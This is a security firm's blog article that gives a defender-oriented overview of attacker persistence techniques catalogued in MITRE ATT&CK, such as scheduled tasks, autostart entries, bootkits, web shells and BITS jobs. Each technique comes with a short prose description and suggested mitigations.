Cyberattacks are complex, strategic endeavors that often follow a structured sequence known as the cyberattack lifecycle. Each stage is critical to the attacker's ultimate goals of ransoming, destroying, stealing, or causing other negative impacts such as reputational damage. Understanding each stage in the cyber attack lifecycle helps defenders prepare appropriate and adequate measures to mitigate threats effectively. According to the philosophy of Lockheed Martin's Cyber Kill Chain: preventing any one stage of an attack can prevent a successful outcome for the attacker.
In this article, we will review an important tactic; maintaining persistence, which is part of the Installation stage of the Cyber Kill Chain model. Persistence allows threat actors to increase their dwell time with more reliable Command And Control (C2); increasing their overall chances of success.
Persistence is a crucial stage often embedded within the Installation phase of a cyber attack. It involves techniques that allow the attacker to maintain a foothold on the system even after reboots, updates, or even to re-install the malware after defenders attempt to remove it from the system.
Malware's ability to persist on a compromised system ensures that the attacker can continue to execute their objectives over an extended period, and increases their chances of success for stealing additional data, spreading across the network, or waiting for a more opportune moment to strike.
Persistence techniques vary widely but commonly include manipulating system processes to restart malicious programs automatically, altering registry keys, or creating scheduled tasks to ensure the malware is initialized at regular intervals. More sophisticated methods might involve writing malware directly into firmware or leveraging rootkit capabilities to embed malicious code within the OS kernel.
All of the items listed below are part of the MITRE ATT&CK Enterprise matrix, a cataloged framework of known cyber attack tactics. Defenders are encouraged to compare these known attack methods to the MITRE D3FEND matrix for guidance on best practices and for mitigating each threat type. However, it's important to note that while MITRE ATT&CK and D3FEND are considered highly effective tools for understanding the cyber attack landscape, they are not a holistic or 100% comprehensive list of attacker behaviors since attackers are always inventing new ways to compromise systems. Those interested in ensuring that MITRE ATT&CK matrices are as comprehensive as possible can watch this informative video for guidance about how to submit an attack profile to SANS.
Here are the most commonly used persistence techniques used in cyber attacks:
Using Accounts For Persistent Access: Attackers could manipulate the configuration of existing accounts, [T1098], creating new accounts for themselves [T1136], or use stolen credentials for valid existing accounts [T1078] in order to maintain long-term access to a compromised system. Regular auditing of user account lists, their access logs, and configuration settings can help detect and mitigate this method of persistent access. Other IT security best practices can also prevent attackers from logging into malicious accounts including allowlisting IP addresses that may be granted access, using Zero Trust solutions, or monitoring network traffic for anomaly activities
Scheduled Task / Job [T1053]: Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system
Boot or Logon Autostart [T1547], Initialization Scripts[T1037], or System Process [T1543]: Attackers often leverage the OS's ability to initialize software during the boot or login process to ensure their malicious code runs every time the system starts or a user logs in. This could involve modifying system configuration files like Windows Registry or startup folders, or inserting scripts in places executed during system boot or user logon like .bash_profile, .bashrc, or systemd services on Linux. Defense strategies include monitoring and managing startup configurations, using security software to detect unauthorized changes, and educating users about secure practices for managing logon scripts
Compromise Host Software Application [T1554]: Attackers can manipulate legitimate software on a host to execute malicious code. Attackers may replace legitimate software binaries with trojanized versions or modify the execution path of existing applications. Ensuring software integrity, using application allowlisting to prevent unauthorized applications from executing, employing user and entity behavior analytics (UEBA) to detect anomalies in application behaviors, and regular system and software integrity checks can help mitigate these risks
Event Triggered Execution [T1546] or Hijack Execution Flow [T1574]: Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events
Implant Internal Virtualization [T1525]: Adversaries can implant malicious virtual machines or other virtual system components (like hypervisors) within the host environment to maintain persistence. Similar to rootkits, this allows the attacker to remain undetected by operating beneath the operating system layer. Detection can be particularly challenging for such low-level persistence techniques. Mitigation efforts include rigorous monitoring of virtual environments, ensuring that entire hard-disk contents are scanned for low-level boot processes, and utilizing EDR solutions capable of identifying rouge virtual machines
By avoiding easy detection, attackers can maintain control over the system without alerting the user or administrators. The effectiveness of a particular persistence strategy depends significantly on the attacker's ability to conceal their presence.
Some commonly used techniques for hiding persistence mechanisms include using Living Off The Land (LOTL) techniques, disguising malicious processes as legitimate software, encrypting payloads, or using a rootkit to infect the system at the OS kernel level. Importantly, when an attacker has higher privileges on a system, they have more covert options for persistence at their disposal.
Here are some other notable techniques used by attackers for persistence:
Browser Extensions [T1176]: Attackers might install malicious internet browser extensions to maintain persistent access to targeted systems. Extensions, or plugins, are popular for enhancing productivity and user experience by providing extended or personalized functionality, but rouge extensions give an attacker persistent covert access and can be used to launch more advanced social engineering attacks, execute data theft, or browser escape attacks
Modify Authentication Process [T1556]: Attackers might tamper with authentication systems and processes to gain access to user credentials or unauthorized entry into accounts. Authentication in various systems is managed through specific mechanisms, including the Local Security Authentication Server (LSASS) and the Security Accounts Manager (SAM) in Windows, pluggable authentication modules (PAM) in Unix-like systems, and authorization plugins in MacOS. These mechanisms are crucial for collecting, storing, and verifying user credentials. By altering these authentication processes, an attacker could potentially gain access to services or systems without needing legitimate account credentials
Modify Power Settings [T1653]: Adversaries may manipulate system power settings to prevent devices from entering low-power modes such as shutdown or hibernation. This tactic is used to ensure that malware continues to run and maintain its functionality without interruption, which can be crucial for continuous data exfiltration, surveillance, or maintaining a persistent presence on the host system
BootKit [T1542.003] or System Firmware Modification [T1542.001]: BootKits and System Firmware Modifications involve modifying firmware or boot components to execute malicious code at a very early stage of the system's boot process. This type of persistence is extremely stealthy and resistant to traditional antivirus solutions and even system reformatting. Protection against such threats requires securing the boot process with measures such as UEFI Secure Boot, employing firmware-level antivirus solutions, and regularly scanning for unauthorized firmware changes
Web Shell [T1505.003]: To maintain persistence on compromised websites, attackers often install web shells—a kind of malicious script that enables remote administration. This allows attackers continuous access to the compromised server. Effective defenses include using web application firewalls (WAFs), conducting regular security scans of web applications to detect and remove unauthorized scripts, and enforcing strict file permissions and other web servers security best practices
BITS Jobs [T1197]: Adversaries may leverage Background Intelligent Transfer Service (BITS) in Windows to create or manipulate BITS jobs to download, execute, and even clean up after executing malicious code. BITS jobs are commonly used by legitimate applications to handle asynchronous file transfers over HTTP, making their abuse particularly stealthy. Defenses against such techniques include monitoring BITS job creation and execution with appropriate security tools, auditing and restricting who can create BITS jobs, and implementing EDR solutions to flag unusual activity associated with BITS
This article delves into persistence techniques utilized in cyberattacks. By examining these methods defenders can better employ measures to detect them and disrupt this critical phase of a cyber attack. The MITRE ATT&CK and D3FEND frameworks can guide defenders in anticipating and mitigating persistence tactics.
Packetlabs assessed the security control capabilities of ACME Inc.’s security program using the ISO/IEC 27001:2022 framework.
Download Sample ReportPacketlabs’ OBPT methodology evaluates the security controls across people, processes and technology in order to identify potential areas of weakness.
Download Sample ReportFebruary 04 - Blog
Blackwood APT uses AiTM attacks that are set to target software updates. Is your organization prepared? Learn more in today's blog.
December 25 - Blog
It's official: Packetlabs has been recognized as one of the top penetration testing companies in 2024 on review platform Clutch.
December 10 - Blog
Hardware token protocols: what are they, and what role do they play in your organization's cybersecurity? In today's article, our ethical hackers outline the most common hardware token protocols.
© 2024 Packetlabs. All rights reserved.